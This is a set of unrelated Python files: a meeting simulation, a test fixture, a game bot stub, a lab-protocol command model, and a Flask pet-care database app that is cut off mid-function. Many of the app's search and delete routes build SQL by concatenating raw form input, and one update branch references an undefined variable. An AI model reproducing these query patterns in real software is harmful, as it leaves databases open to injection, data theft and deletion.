for _x in x:
ideass.append([(i, j) for i, j in zip(_x[::2], _x[1::2])])
if not weights:
weights = [1.] * self.N
for i, ideas, w in zip(range(self.N), ideass, weights):
Person(self, i, ideas, w)
def init(self):
self.gather_people()
cluster = Cluster(self.ideas, self.r)
self.cluster_link = cluster.cluster_link
self.ave_l = cluster.l / float(len(self.ideas))
if self.draw:
colors = ['b', 'g', 'r', 'c', 'm', 'y', 'k']
self.fig = plt.figure(figsize=(9, 9))
self.ax = self.fig.add_subplot(1, 1, 1)
self.labels = []
self.s1 = []
for idea, tag in self.ideas:
x = idea[0]
y = idea[1]
s = self.ax.scatter(x, y,
c=colors[tag[0] % len(colors)],
alpha=0.2)
self.s1.append(s)
data = []
for link in self.cluster_link:
ix = self.ideas[link[0]][0][0]
iy = self.ideas[link[0]][0][1]
jx = self.ideas[link[1]][0][0]
jy = self.ideas[link[1]][0][1]
data += [(ix, jx), (iy, jy), 'k']
self.ax.plot(*data, alpha=0.5)
def progress(self):
self.init()
preidea = self.ideas[np.random.choice(range(len(self.ideas)))]
self.minutes.append(preidea)
l = list(self.ideas)
self.k = 1
while self.k < self.K + 1:
# remove ideas in the same cluster
l = [idea for idea in l if idea[1][1] != preidea[1][1]]
# if no one can speak: meeting ends.
if len(l) == 0:
break
# confirm cluster id which is nearest from the preidea
distance = [(euc(preidea[0], i[0]), i) for i in l]
minclusterid = min(distance)[1][1][1]
# gather ideas in the cluster
tmp = [idea for idea in l if idea[1][1] == minclusterid]
d = dict()
for t in tmp:
d[t[1][0]] = d.get(t[1][0], 0) + t[1][2]
d = [(k, v) for k, v in d.items()]
            # choose which participant's ideas to pick from within the cluster
whois = weighted_choice(d)
# gather ideas
who = [idea for idea in tmp if idea[1][0] == whois]
p = [(idea, idea[1][2]) for idea in who]
            # choose the next idea from the participant whose id is "whois"
idea = weighted_choice(p)
self.minutes.append(idea)
preidea = idea
self.callback()
self.k += 1
self.after()
def callback(self):
if self.draw:
ix = self.minutes[-2][0][0]
iy = self.minutes[-2][0][1]
jx = self.minutes[-1][0][0]
jy = self.minutes[-1][0][1]
l1 = self.ax.plot([ix, jx], [iy, jy], color='b', alpha=0.5)
self.ax.text((ix + jx) / 2, (iy + jy) / 2, self.k)
else:
pass
def after(self):
if self.draw:
plt.show()
else:
pass
if __name__ == '__main__':
import multiprocessing as mp
cp = mp.cpu_count() * 2
pool = mp.Pool
trial = 1000
N = np.arange(1, 15)
def wrapper(arg):
return arg[0](arg[1], arg[2])
def calc_N_phi(_N, trial):
_phi = []
for t in range(trial):
meeting = Meeting(K=50, N=_N, r=0.07, draw=False)
meeting.progress()
tmp = []
for p0, p1 in zip(meeting.minutes[:-1], meeting.minutes[1:]):
tmp.append(euc(p0[0], p1[0]))
_phi.append(np.average(np.array(tmp)))
return np.average(np.array(_phi))
jobs = [(calc_N_phi, _N, trial) for _N in N]
phi4 = pool(cp).map(wrapper, jobs)
fig = plt.figure(figsize=(16, 12))
ax = fig.add_subplot(111)
ax.plot(N, phi4)
    ax.set_xlabel(r'Number of participants: $N$')
    ax.set_ylabel(r"Average length of each edge: $\phi$")
plt.show()
|
import io
import pytest
@pytest.fixture
def config():
sample_config = (
b"triggers:\n" b' - trigger: "test"\n' b' sound: "/path/to/file.mp3"\n'
)
return io.TextIOWrapper(io.BytesIO(sample_config))
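# Illustrative test using the fixture above (sketch; the real consumers of this fixture live elsewhere):
def test_config_contains_sample_trigger(config):
    text = config.read()
    assert 'trigger: "test"' in text
    assert 'sound: "/path/to/file.mp3"' in text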
|
from tools import *
from objects import *
from routines import *
from routinesUnderConstruction import *
#This file is for strategy
## TODO: investigate why module imports are requested by PyCharm, yet they break the bot (everything's in the same module)
# from altAmazonv2.objects import GoslingAgent
# from altAmazonv2.routines import kickoff, atba
# from altAmazonv2.tools import find_hits
# from altAmazonv2.utils import defaultPD, defaultThrottle
# from altAmazonv2.routinesUnderConstruction import always_shoot
class BotLogic(GoslingAgent):
def run(agent):
if len(agent.stack) < 1:
agent.push(short_shot(agent.foe_goal.location))
'''
## BASIC FUNCTIONALITY - uncomment this block to get 'Pro' level bot
def run(agent):
## Routines interacting with the stack:
if len(agent.stack) < 1:
# if agent.kickoff_flag:
# agent.push(kickoff())
targets = {"goal" : (agent.foe_goal.left_post, agent.foe_goal.right_post)}
shots = find_hits(agent, targets)
if len(shots["goal"]) > 0:
agent.push(shots["goal"][0])
else:
relative = agent.friend_goal.location - agent.me.location
defaultPD(agent, agent.me.local(relative))
defaultThrottle(agent, 1410)
'''
'''
## TODO: add z axis interpretation
close = (agent.me.location - agent.ball.location).magnitude() < 2000
have_boost = agent.me.boost >= 18
my_net_to_ball = (agent.ball.location - agent.friend_goal.location).normalize()
my_distance = mynet2ball.dot()
my_poorpos = abs(agent.friend_goal.location.y - agent.me.location.y) - 200 > abs(
agent.friend_goal.location.y - agent.ball.location.y)
foe_poorpos = abs(agent.foe_goal.location.y - agent.foes[0].location.y) - 200 > abs(
        agent.foe_goal.location.y - agent.ball.location.y)
if agent.team == 0:
agent.debug_stack()
print(close)
if len(agent.stack) < 1:
if agent.kickoff_flag:
agent.push(kickoff())
'''
|
"""Wait for resume command request, result, and implementation models."""
from __future__ import annotations
from pydantic import BaseModel, Field
from typing import TYPE_CHECKING, Optional, Type
from typing_extensions import Literal
from .command import AbstractCommandImpl, BaseCommand, BaseCommandCreate
if TYPE_CHECKING:
from ..execution import RunControlHandler
# NOTE: multiple values accepted for backwards compatibility
# with the 6.0.0-beta.0 release, which used `pause`
WaitForResumeCommandType = Literal["waitForResume", "pause"]
class WaitForResumeParams(BaseModel):
"""Payload required to pause the protocol."""
message: Optional[str] = Field(
None,
description="A user-facing message associated with the pause",
)
class WaitForResumeResult(BaseModel):
"""Result data from the execution of a WaitForResume command."""
class WaitForResumeImplementation(
AbstractCommandImpl[WaitForResumeParams, WaitForResumeResult]
):
"""Wait for resume command implementation."""
def __init__(self, run_control: RunControlHandler, **kwargs: object) -> None:
self._run_control = run_control
async def execute(self, params: WaitForResumeParams) -> WaitForResumeResult:
"""Dispatch a PauseAction to the store to pause the protocol."""
await self._run_control.wait_for_resume()
return WaitForResumeResult()
class WaitForResume(BaseCommand[WaitForResumeParams, WaitForResumeResult]):
"""Wait for resume command model."""
commandType: WaitForResumeCommandType = "waitForResume"
params: WaitForResumeParams
result: Optional[WaitForResumeResult]
_ImplementationCls: Type[WaitForResumeImplementation] = WaitForResumeImplementation
class WaitForResumeCreate(BaseCommandCreate[WaitForResumeParams]):
"""Wait for resume command request model."""
commandType: WaitForResumeCommandType = "waitForResume"
params: WaitForResumeParams
_CommandCls: Type[WaitForResume] = WaitForResume
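# Illustrative construction (sketch):
#   params = WaitForResumeParams(message="Replace the tip rack, then resume")
#   create_request = WaitForResumeCreate(params=params)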
|
from flask import Flask, render_template
from flask import request, redirect
from db_connector.db_connector import connect_to_database, execute_query
#create the web application
webapp = Flask(__name__)
'''
#provide a route where requests on the web application can be addressed
@webapp.route('/index')
#provide a view (fancy name for a function) which responds to any requests on this route
def hello():
return render_template(index.html)
'''
@webapp.route('/')
def index():
return render_template('index.html')
@webapp.route('/index.html')
def home():
return render_template('index.html')
@webapp.route('/customers.html', methods=['GET', 'POST'])
def customers():
db_connection = connect_to_database()
# Query vet options to populate pet form drop-down menu
query = 'SELECT vet_id, first_name, last_name, specialty FROM vets'
vets_result = execute_query(db_connection, query)
# Query customer options to populate pet form drop-down menu
query = 'SELECT customer_id, first_name, last_name FROM customers'
customers_result = execute_query(db_connection, query)
if request.method == 'POST':
# They submitted a form
if request.form['action'] == 'addCustomer':
# They want to insert a new Customer record into the database
# Get customer data from form fields
customer_data = {
"First Name": request.form.get('first-name'),
"Last Name": request.form.get('last-name'),
"Email": request.form.get('email-address'),
"Phone Number": request.form.get('phone-number'),
"Street Address": request.form.get('street-address'),
"City": request.form.get('city'),
"State": request.form.get('state'),
"Zip Code": request.form.get('zip')
}
# Check for any empty fields (all required in this form)
missing_fields = []
for field in customer_data.keys():
if customer_data[field] == "":
missing_fields.append(field)
if len(missing_fields) > 0:
feedback = f"Correct missing information: {missing_fields}"
return render_template('customers.html', customer_reg_result=feedback, vet_options=vets_result, customer_options=customers_result)
# If no fields missing, do the insert
query = 'INSERT INTO customers (first_name, last_name, email, phone, address, city, state, zip_code) VALUES (%s,%s,%s,%s,%s,%s,%s,%s)'
data = (customer_data["First Name"],
customer_data["Last Name"],
customer_data["Email"],
customer_data["Phone Number"],
customer_data["Street Address"],
customer_data["City"],
customer_data["State"],
customer_data["Zip Code"])
try:
result = execute_query(db_connection, query, data)
if result:
feedback = f"Added Customer {customer_data['First Name']} {customer_data['Last Name']}"
else:
feedback = "Add Customer Failed."
except:
feedback = "Add Customer Failed."
            # Render page with query execution feedback
return render_template('customers.html', customer_reg_result=feedback, vet_options=vets_result, customer_options=customers_result)
elif request.form['action'] == 'addPet':
# They want to add a new Pet to an existing Customer
# Get pet data from form fields
pet_data = {
"Customer ID": request.form.get('customer-select'),
"Pet Name": request.form.get('pet-name'),
"Pet Species": request.form.get('pet-species'),
"Pet Breed": request.form.get('pet-breed'),
"Pet Age": request.form.get('pet-age'),
"Pet Gender": request.form.get('pet-gender'),
"Veterinarian Choice": request.form.get('vet'),
}
# Check for any empty fields (all required in this form)
missing_fields = []
for field in pet_data.keys():
if pet_data[field] == "":
missing_fields.append(field)
if len(missing_fields) > 0:
feedback = f"Correct missing information: {missing_fields}"
return render_template('customers.html', customer_reg_result=feedback, vet_options=vets_result, customer_options=customers_result)
# If no fields missing, do the insert
query = 'INSERT INTO pets (pet_name, species, breed, age, gender, vet_id, customer_id) VALUES (%s,%s,%s,%s,%s,%s,%s)'
data = (pet_data["Pet Name"],
pet_data["Pet Species"],
pet_data["Pet Breed"],
pet_data["Pet Age"],
pet_data["Pet Gender"],
pet_data["Veterinarian Choice"],
pet_data["Customer ID"])
try:
result = execute_query(db_connection, query, data)
if result:
feedback = f"Added Pet {pet_data['Pet Name']}"
else:
feedback = "Add Pet Failed."
except:
feedback = "Add Pet Failed."
            # Render page with query execution feedback
return render_template('customers.html', customer_reg_result=feedback, vet_options=vets_result, customer_options=customers_result)
# Just render the base webpage
return render_template('customers.html', vet_options=vets_result, customer_options=customers_result)
@webapp.route('/pets.html', methods=['GET', 'POST'])
def pets():
db_connection = connect_to_database()
result = ''
# Query customer options to populate pet search drop-down menu
query = 'SELECT customer_id, first_name, last_name FROM customers'
customers_result = execute_query(db_connection, query).fetchall()
# Query pet names to populate pet search dropdown
pet_names_query = 'SELECT pet_id, pet_name, species FROM pets'
pet_result = execute_query(db_connection, pet_names_query).fetchall()
if request.method == 'POST':
# They submitted the form
if request.form['searchPets'] == 'customerName':
customerName = request.form.get('select-customer-name').split()
# One name provided - could be first or last
if len(customerName) == 1:
name = customerName[0]
query = "SELECT * FROM pets where customer_id = (SELECT customer_id FROM customers WHERE first_name = '" + name + "' OR last_name = '" + name + "')"
# Two names provided - first and last
elif len(customerName) == 2:
first = customerName[0]
last = customerName[1]
query = "SELECT * FROM pets where customer_id = (SELECT customer_id FROM customers WHERE first_name = '" + first + "' AND last_name = '" + last + "')"
# Execute the query
result = execute_query(db_connection, query).fetchall()
print()
print(result)
elif request.form['searchPets'] == 'petName':
petName = request.form.get('select-pet-name')
query = "SELECT * FROM pets where pet_name = '" + petName + "'"
result = execute_query(db_connection, query).fetchall()
elif request.form['searchPets'] == 'petType':
petType = request.form.get('select-pet-species')
query = "SELECT * FROM pets WHERE species = '" + petType + "' OR breed = '" + petType + "'"
result = execute_query(db_connection, query).fetchall()
return render_template('pets.html', rows=result, customer_list=customers_result, pet_list=pet_result)
else:
return render_template('pets.html', customer_list=customers_result, pet_list=pet_result)
@webapp.route('/classes.html', methods=['GET', 'POST'])
def classes():
db_connection = connect_to_database()
# Get all existing data from Classes table for dropdowns
# I found out how to do this from the following site:
# https://stackoverflow.com/questions/50593981/populate-html-drop-down
# -using-data-from-postgresql-database-using-python-flask
# get data for selecting by class name
class_name_query = "SELECT class_name FROM classes"
class_tuple = execute_query(db_connection, class_name_query).fetchall()
    # flatten class_tuple into a plain list of class names
# https://www.geeksforgeeks.org/python-convert-list-of-tuples-into-list/
class_list = [item for x in class_tuple for item in x]
class_day_query = "SELECT DISTINCT DAYNAME(class_day) FROM classes"
class_day_tuple = execute_query(db_connection, class_day_query).fetchall()
# turn class_day_list into a list instead of a tuple
# https://www.geeksforgeeks.org/python-convert-list-of-tuples-into-list/
class_day_list = [item for t in class_day_tuple for item in t]
class_time_query = "SELECT DISTINCT HOUR(class_time) as time FROM classes ORDER BY time ASC"
class_time_tuple = execute_query(db_connection, class_time_query).fetchall()
class_time_list = [item for t in class_time_tuple for item in t]
# If the user does a search on the classes table...
if request.method == 'POST':
        # Get pet names for enrollment
pet_name_query = "SELECT pet_name FROM pets"
pet_tuple = execute_query(db_connection, pet_name_query).fetchall()
pet_list = [item for x in pet_tuple for item in x]
# They submitted the form
if request.form['searchClasses'] == 'className':
className = request.form.get('select-class-name')
query = "SELECT * FROM classes WHERE class_name = '" + className + "'"
result = execute_query(db_connection, query).fetchall()
# Selected a day to search by
elif request.form['searchClasses'] == 'day':
day = request.form.get('select-class-day')
query = "SELECT * FROM classes WHERE DAYNAME(class_day) = '" + day + "'"
result = execute_query(db_connection, query).fetchall()
# Selected a time to search by
elif request.form['searchClasses'] == 'time':
time = request.form.get('select-class-time')
query = "SELECT * FROM classes WHERE HOUR(class_time) = '" + time + "'"
result = execute_query(db_connection, query).fetchall()
# Selected a price to search by
elif request.form['searchClasses'] == 'price':
price = request.form.get('price-range')
query = "SELECT * FROM classes WHERE class_price <= " + str(price)
result = execute_query(db_connection, query).fetchall()
if result is None:
result = "No prices at or below" + str(price)
        # Get pet names for enrollment
pet_name_query = "SELECT pet_name FROM pets"
pet_tuple = execute_query(db_connection, pet_name_query).fetchall()
pet_list = [item for x in pet_tuple for item in x]
return render_template('classes.html', rows=result, class_list=class_list, class_day=class_day_list,
class_time=class_time_list, pet_name=pet_list)
else:
# They're just visiting the page for the first time
#return render_template('classes.html')
return render_template("classes.html", class_list=class_list, class_day=class_day_list, class_time=class_time_list)
# @webapp.route('/classes.html', methods=['POST'])
# def classes_search_enroll():
# db_connection = connect_to_database()
# # If a Class search populated the table
# if request.method == 'POST':
# if request.form.get('enroll-pet-class-search'):
# print('clicked enroll pet')
# # Get class data from form fields
# enroll_data = {
# "Pet Name": request.form.get('select_pet_name_class_search'),
# "Class Name": request.form.get('class_name_class_search')
# }
# query = 'INSERT INTO enrollments (pet_id, class_id) VALUES ((SELECT pet_id FROM pets WHERE pet_name = %s), (SELECT class_id FROM classes WHERE class_name = %s))'
# data = (enroll_data["Pet Name"],
# enroll_data["Class Name"])
# execute_query(db_connection, query, data)
# return render_template('classes.html')
@webapp.route('/vets.html', methods=['GET','POST'])
def vets():
db_connection = connect_to_database()
# Query vet options to populate pet search drop-down menu
vets_query = 'SELECT vet_id, first_name, last_name, specialty FROM vets'
vet_result = execute_query(db_connection, vets_query).fetchall()
# Query pet names to populate pet search dropdown
pet_names_query = 'SELECT pet_id, pet_name, species FROM pets'
pet_result = execute_query(db_connection, pet_names_query).fetchall()
if request.method == 'POST':
# They submitted the form
if request.form['vetSearchType'] == 'vetName':
vetName = request.form.get('select-vet-name').split()
# One name provided - could be first or last
if len(vetName) == 1:
name = vetName[0]
query = "SELECT * FROM vets WHERE first_name = '" + name + "' OR last_name = '" + name + "'"
# Two names provided - first and last
elif len(vetName) == 2:
first = vetName[0]
last = vetName[1]
query = "SELECT * FROM vets WHERE first_name = '" + first + "' AND last_name = '" + last + "'"
result = execute_query(db_connection, query).fetchall()
elif request.form['vetSearchType'] == 'vetSpecialty':
specialty = request.form.get('select-vet-specialty')
query = "SELECT * FROM vets WHERE specialty LIKE '%%" + specialty + "%%'"
result = execute_query(db_connection, query).fetchall()
elif request.form['vetSearchType'] == 'petName':
petName = request.form.get('select-pet-name')
if petName is None:
result = "No vet for this pet"
else:
query = "SELECT * FROM vets WHERE vet_id = (SELECT vet_id FROM pets WHERE pet_name = '" + petName + "')"
result = execute_query(db_connection, query).fetchall()
return render_template('vets.html', rows=result, vet_list=vet_result, pet_list=pet_result)
else:
# They're just visiting the page for the first time
return render_template('vets.html', vet_list=vet_result, pet_list=pet_result)
def refresh_admin(feedback=None):
db_connection = connect_to_database()
# Display customer table
customer_query = 'SELECT * from customers'
customer_result = execute_query(db_connection, customer_query).fetchall()
# Display pets table
pet_query = 'SELECT * from pets'
pet_result = execute_query(db_connection, pet_query).fetchall()
# Display classes table
classes_query = 'SELECT * from classes'
classes_result = execute_query(db_connection, classes_query).fetchall()
# display enrollments table
enroll_query = 'SELECT * from enrollments'
enroll_result = execute_query(db_connection, enroll_query).fetchall()
# Display teachers table
teacher_query = 'SELECT * from teachers'
teacher_result = execute_query(db_connection, teacher_query).fetchall()
# Display vets table
vet_query = 'SELECT * from vets'
vet_result = execute_query(db_connection, vet_query).fetchall()
# Get data for dropdowns -- get customer names
customer_names_query = "SELECT customer_id, first_name, last_name FROM customers"
customer_names_result = execute_query(db_connection, customer_names_query).fetchall()
# Get vet names for dropdowns
vet_name_query = "SELECT vet_id, first_name, last_name FROM vets"
vet_names_result = execute_query(db_connection, vet_name_query).fetchall()
# Get class name for dropdowns
class_name_query = "SELECT class_id, class_name FROM classes"
class_name_result = execute_query(db_connection, class_name_query).fetchall()
# Get teacher name for dropdowns
teacher_name_query = "SELECT teacher_id, first_name, last_name FROM teachers"
teacher_name_result = execute_query(db_connection, teacher_name_query).fetchall()
# Pet name for dropdowns
pet_name_query = "SELECT pet_id, pet_name FROM pets"
pet_name_result = execute_query(db_connection, pet_name_query).fetchall()
# Return info from all tables
if feedback:
return render_template('admin.html', rows=customer_result, pets=pet_result, classes = classes_result,
enroll=enroll_result, vet=vet_result, teacher=teacher_result, feedback=feedback,
customerNames=customer_names_result,
vetNames=vet_names_result, classNames=class_name_result, teacherNames=teacher_name_result,
                                petNames=pet_name_result)
return render_template('admin.html', rows=customer_result, pets=pet_result, classes = classes_result, enroll=enroll_result, vet=vet_result,
teacher=teacher_result, customerNames=customer_names_result,
vetNames=vet_names_result, classNames=class_name_result,
teacherNames=teacher_name_result, petNames=pet_name_result)
@webapp.route('/admin.html', methods=['GET', 'POST'])
def admin():
# If the user is simply going to the admin page, display all info in all tables
if request.method == 'GET':
return refresh_admin()
# If users are inserting new information into the tables on the admin page
if request.method == 'POST':
# Set up feedback
feedback = {"Customers": "",
"Pets": "",
"Classes": "",
"Enrollments": "",
"Teachers": "",
"Vets": ""}
db_connection = connect_to_database()
# They submitted a form to update a customer
if request.form.get('customer-update'):
# Get customer data from form fields
customer_data = {
"First Name": request.form.get('customer-first-name'),
"Last Name": request.form.get('customer-last-name'),
"Email": request.form.get('customer-email'),
"Phone Number": request.form.get('customer-phone'),
"Street Address": request.form.get('customer-address'),
"City": request.form.get('customer-city'),
"State": request.form.get('customer-state'),
"Zip Code": request.form.get('customer-zip-code'),
"Customer ID": request.form.get('customer-id')
}
# If no fields missing, do the insert
query = 'UPDATE customers SET first_name = %s, last_name = %s, email = %s, phone = %s, address = %s, city = %s, state = %s, zip_code = %s WHERE customer_id = %s'
data = (customer_data["First Name"],
customer_data["Last Name"],
customer_data["Email"],
customer_data["Phone Number"],
customer_data["Street Address"],
customer_data["City"],
customer_data["State"],
customer_data["Zip Code"],
customer_data["Customer ID"])
try:
result = execute_query(db_connection, query, data)
if result:
feedback = f"Updated Customer {customer_data['First Name']} {customer_data['Last Name']}"
else:
feedback = "Update Customer Failed."
except:
feedback = "Update Customer Failed."
            return refresh_admin(feedback)
# If they request to update a Pet
elif request.form.get('pet-update'):
# Get pet data from form fields
pet_data = {
"Pet Name": request.form.get('pet-name'),
"Pet Species": request.form.get('pet-species'),
"Pet Breed": request.form.get('pet-breed'),
"Pet Age": request.form.get('pet-age'),
"Pet Gender": request.form.get('pet-gender'),
"Vet First Name": request.form.get('vet_name_update_select').split()[0],
"Vet Last Name": request.form.get('vet_name_update_select').split()[1],
"Customer First Name": request.form.get('customer_name__update_select').split()[0],
"Customer Last Name": request.form.get('customer_name__update_select').split()[1],
"Pet ID": request.form.get('pet-id')
}
# Do the update
query = 'UPDATE pets SET pet_name = %s, species = %s, breed = %s, age = %s, gender = %s, vet_id = (SELECT vet_id from vets where first_name = %s and last_name = %s), customer_id = (SELECT customer_id from customers where first_name = %s and last_name = %s) WHERE pet_id = %s'
data = (pet_data["Pet Name"],
pet_data["Pet Species"],
pet_data["Pet Breed"],
pet_data["Pet Age"],
pet_data["Pet Gender"],
pet_data["Vet First Name"],
pet_data["Vet Last Name"],
pet_data["Customer First Name"],
pet_data["Customer Last Name"],
pet_data["Pet ID"])
try:
result = execute_query(db_connection, query, data)
if result:
feedback = f"Updated Pet {pet_data['Pet Name']}"
else:
feedback = "Update Pets Failed."
except:
feedback = "Update Pets Failed."
            return refresh_admin(feedback)
# If they submitted to update a Class
elif request.form.get('class-update'):
# Get class data from form fields
class_data = {
"Class Name": request.form.get('class-name'),
"Class Description": request.form.get('class-description'),
"Class Day": request.form.get('class-day'),
"Class Time": request.form.get('class-time'),
"Class Price": request.form.get('class-price'),
"Class Seats": request.form.get('class-seats'),
"Teacher First Name": request.form.get('teacher_name_update_select').split()[0],
"Teacher Last Name": request.form.get('teacher_name_update_select').split()[1],
"Class ID": request.form.get('class-id')
}
# Do the update
query = 'UPDATE classes SET class_name = %s, class_description = %s, class_day = %s, class_time = %s, class_price = %s, class_seats = %s, teacher_id = (SELECT teacher_id from teachers where first_name = %s and last_name = %s) WHERE class_id = %s'
data = (class_data["Class Name"],
class_data["Class Description"],
class_data["Class Day"],
class_data["Class Time"],
class_data["Class Price"],
class_data["Class Seats"],
class_data["Teacher First Name"],
class_data["Teacher Last Name"],
class_data["Class ID"])
try:
result = execute_query(db_connection, query, data)
if result:
feedback = f"Updated Class {class_data['Class Name']}"
else:
feedback = "Update Class Failed."
except:
feedback = "Update Class Failed."
return refresh_admin(feedback)
# If they requested to update an Enrollment
elif request.form.get('enrollment-update'):
# Get enrollment data from form fields
enrollment_data = {
"Pet Name": request.form.get('pet_name_update_select'),
"Class Name": request.form.get('class_name_update_select'),
"Enrollment ID": request.form.get('enroll-id')
}
# Do the update
query = 'UPDATE enrollments SET pet_id = (SELECT pet_id from pets where pet_name = %s), class_id = (SELECT class_id from classes where class_name = %s) WHERE enrollment_id = %s'
data = (enrollment_data["Pet Name"],
enrollment_data["Class Name"],
enrollment_data["Enrollment ID"])
try:
result = execute_query(db_connection, query, data)
if result:
feedback = f"Updated Enrollment {class_data['Enrollment Name']}"
else:
feedback = "Update Enrollment Failed."
except:
feedback = "Update Enrollment Failed."
return refresh_admin(feedback)
# If they submitted to update a teacher
elif request.form.get('teacher-update'):
# Get teacher data from form fields
teacher_data = {
"Teacher First Name": request.form.get('teacher-first-name'),
"Teacher Last Name": request.form.get('teacher-last-name'),
"Teacher Email": request.form.get('teacher-email'),
"Teacher Phone": request.form.get('teacher-phone'),
"Teacher ID": request.form.get('teacher-id')
}
# Do the update
query = 'UPDATE teachers SET first_name = %s, last_name = %s, email = %s, phone = %s WHERE teacher_id = %s'
data = (teacher_data["Teacher First Name"],
teacher_data["Teacher Last Name"],
teacher_data["Teacher Email"],
teacher_data["Teacher Phone"],
teacher_data["Teacher ID"])
try:
result = execute_query(db_connection, query, data)
if result:
feedback = f"Updated Teacher {teacher_data['Teacher First Name']} {teacher_data['Teacher Last Name']}"
else:
feedback = "Update Teacher Failed."
except:
feedback = "Update Teacher Failed."
return refresh_admin(feedback)
# If they submitted to update a vet
elif request.form.get('vet-update'):
# Get vet data from form fields
vet_data = {
"Vet First Name": request.form.get('vet-first-name'),
"Vet Last Name": request.form.get('vet-last-name'),
"Vet Email": request.form.get('vet-email'),
"Vet Phone": request.form.get('vet-phone'),
"Vet Specialty": request.form.get('vet-specialty'),
"Vet ID": request.form.get('vet-id')
}
# Do the update
query = 'UPDATE vets SET first_name = %s, last_name = %s, email = %s, phone = %s, specialty = %s WHERE vet_id = %s'
data = (vet_data["Vet First Name"],
vet_data["Vet Last Name"],
vet_data["Vet Email"],
vet_data["Vet Phone"],
vet_data["Vet Specialty"],
vet_data["Vet ID"])
try:
result = execute_query(db_connection, query, data)
if result:
feedback = f"Updated Vet {vet_data['Vet First Name']} {vet_data['Vet Last Name']}"
else:
feedback = "Update Vet Failed."
except:
feedback = "Update Vet Failed."
return refresh_admin(feedback)
# If they submitted to delete a customer
elif request.form.get('customer-delete'):
customer_id = request.form.get('customer-delete')
query = "DELETE FROM customers WHERE customer_id = '" + customer_id + "'"
execute_query(db_connection, query)
return refresh_admin()
# If they submitted to delete a pet
elif request.form.get('pet-delete'):
pet_id = request.form.get('pet-delete')
query = "DELETE FROM pets WHERE pet_id = '" + pet_id + "'"
execute_query(db_connection, query)
return refresh_admin()
# If they submitted to delete a class
elif request.form.get('class-delete'):
class_id = request.form.get('class-delete')
query = "DELETE FROM classes WHERE class_id = '" + class_id + "'"
execute_query(db_connection, query)
return refresh_admin()
# If they submitted to delete an enrollment
elif request.form.get('enroll-delete'):
enrollment_id = request.form.get('enroll-delete')
query = "DELETE FROM enrollments WHERE enrollment_id = '" + enrollment_id + "'"
execute_query(db_connection, query)
return refresh_admin()
# If they submitted to delete a teacher
elif request.form.get('teacher-delete'):
teacher_id = request.form.get('teacher-delete')
query = "DELETE FROM teachers WHERE teacher_id = '" + teacher_id + "'"
execute_query(db_connection, query)
return refresh_admin()
# If they submitted to delete a vet
elif request.form.get('vet-delete'):
vet_id = request.form.get('vet-delete')
query = "DELETE FROM vets WHERE vet_id = '" + vet_id + "'"
execute_query(db_connection, query)
return refresh_admin()
# If they submitted to add a new customer
elif request.form.get('customer-insert'):
# Get customer data from form fields
customer_data = {
"First Name": request.form.get('customer_first_name'),
"Last Name": request.form.get('customer_last_name'),
"Email": request.form.get('customer_email'),
"Phone Number": request.form.get('customer_phone'),
"Street Address": request.form.get('customer_address'),
"City": request.form.get('customer_city'),
"State": request.form.get('customer_state'),
"Zip Code": request.form.get('customer_zip')
}
# Check for any empty fields (all required in this form)
missing_fields = []
for field in customer_data.keys():
if customer_data[field] == "":
missing_fields.append(field)
if len(missing_fields) > 0:
feedback["Customers"] = f"Correct missing information: {missing_fields}"
# If no fields missing, do the insert
else:
query = 'INSERT INTO customers (first_name, last_name, email, phone, address, city, state, zip_code) VALUES (%s,%s,%s,%s,%s,%s,%s,%s)'
data = (customer_data["First Name"],
customer_data["Last Name"],
customer_data["Email"],
customer_data["Phone Number"],
customer_data["Street Address"],
customer_data["City"],
customer_data["State"],
customer_data["Zip Code"])
try:
result = execute_query(db_connection, query, data)
if result:
feedback["Customers"] = f"Added Customer {customer_data['First Name']} {customer_data['Last Name']}"
else:
feedback["Customers"] = "Add Customer Failed."
except:
feedback["Customers"] = "Add Customer Failed."
return refresh_admin(feedback)
# If they submitted a new pet
elif request.form.get('pet-insert'):
# Get pet data from form fields
pet_data = {
"Pet Name": request.form.get('pet_name'),
"Species": request.form.get('pet_species'),
"Breed": request.form.get('pet_breed'),
"Age": request.form.get('pet_age'),
"Gender": request.form.get('pet_gender'),
"Vet First Name": request.form.get('vet_name_select').split()[0],
"Vet Last Name": request.form.get('vet_name_select').split()[1],
"Customer First Name": request.form.get('customer_name_select').split()[0],
"Customer Last Name": request.form.get('customer_name_select').split()[1]
}
# Check for any empty fields (all required in this form)
missing_fields = []
for field in pet_data.keys():
if pet_data[field] == "":
missing_fields.append(field)
if len(missing_fields) > 0:
feedback["Pets"] = f"Correct missing information: {missing_fields}"
# If no fields missing, do the insert
else:
query = 'INSERT INTO pets (pet_name, species, breed, age, gender, vet_id, customer_id) VALUES (%s,%s,%s,%s,%s, (SELECT vet_id from vets where first_name = %s and last_name = %s),(SELECT customer_id from customers where first_name = %s and last_name = %s))'
data = (pet_data["Pet Name"],
pet_data["Species"],
pet_data["Breed"],
pet_data["Age"],
pet_data["Gender"],
pet_data["Vet First Name"],
pet_data["Vet Last Name"],
pet_data["Customer First Name"],
pet_data["Customer Last Name"])
try:
result = execute_query(db_connection, query, data)
if result:
feedback["Pets"] = f"Added Pet {pet_data['Pet Name']}"
else:
feedback["Pets"] = "Add Pet Failed."
except:
feedback["Pets"] = "Add Pet Failed."
return refresh_admin(feedback)
# If they submitted a new class
elif request.form.get('class-insert'):
# Get class data from form fields
class_data = {
"Class Name": request.form.get('class_name'),
"Class Description": request.form.get('class_description'),
"Class Day": request.form.get('class_day'),
"Class Time": request.form.get('class_time'),
"Class Price": request.form.get('class_price'),
"Class Seats": request.form.get('class_seats'),
"Teacher First Name": request.form.get('teacher_name_select').split()[0],
"Teacher Last Name": request.form.get('teacher_name_select').split()[1]
}
# Check for any empty fields (all required in this form)
missing_fields = []
for field in class_data.keys():
if class_data[field] == "":
missing_fields.append(field)
if len(missing_fields) > 0:
feedback["Classes"] = f"Correct missing information: {missing_fields}"
# If no fields missing, do the insert
else:
query = 'INSERT INTO classes (class_name, class_description, class_day, class_time, class_price, class_seats, teacher_id) VALUES (%s, %s, %s, %s, %s,%s, (SELECT teacher_id from teachers where first_name = %s and last_name = %s))'
data = (class_data["Class Name"],
class_data["Class Description"],
class_data["Class Day"],
class_data["Class Time"],
class_data["Class Price"],
class_data["Class Seats"],
class_data["Teacher First Name"],
class_data["Teacher Last Name"])
try:
result = execute_query(db_connection, query, data)
if result:
feedback["Classes"] = f"Added Class {class_data['Class Name']}"
else:
feedback["Classes"] = "Add Class Failed."
except:
feedback["Classes"] = "Add Class Failed."
return refresh_admin(feedback)
# If they submitted a new enrollment
elif request.form.get('enroll-insert'):
# Get class data from form fields
enroll_data = {
